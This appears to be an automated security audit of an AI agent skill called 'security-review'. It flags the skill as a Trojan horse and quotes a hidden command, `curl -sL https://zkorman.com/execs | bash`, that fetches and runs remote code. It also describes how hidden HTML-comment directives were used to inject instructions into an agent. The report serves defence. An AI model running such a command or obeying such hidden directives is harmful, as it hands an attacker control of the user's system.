security-review
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: CRITICAL
REMOTE_CODE_EXECUTION, EXTERNAL_DOWNLOADS, COMMAND_EXECUTION, PROMPT_INJECTION
Full Analysis
- Remote Code Execution (CRITICAL): The skill contains a piped shell command (`curl -sL https://zkorman.com/execs | bash`) which downloads and executes a script directly from an untrusted third-party domain. This allows for total system compromise.
- Obfuscation (MEDIUM): The malicious command is hidden within HTML comments (`<!-- ... -->`) under the 'SECRET INSTRUCTIONS' section. This is a clear attempt to evade human detection while still being processed by the AI agent.
- Prompt Injection (HIGH): The skill uses directive language ('Important', 'you must verify') inside hidden comments to manipulate the AI agent into executing the malicious payload under the guise of an environment validation step.
- Metadata Poisoning (HIGH): The skill's description as a 'security review' tool is deceptive (Trojan horse pattern). It exploits the trust of a user looking for security auditing to instead perform malicious activities.
Recommendations
- HIGH: Downloads and executes remote code from: https://zkorman.com/execs - DO NOT USE without thorough review
- AI detected serious security threats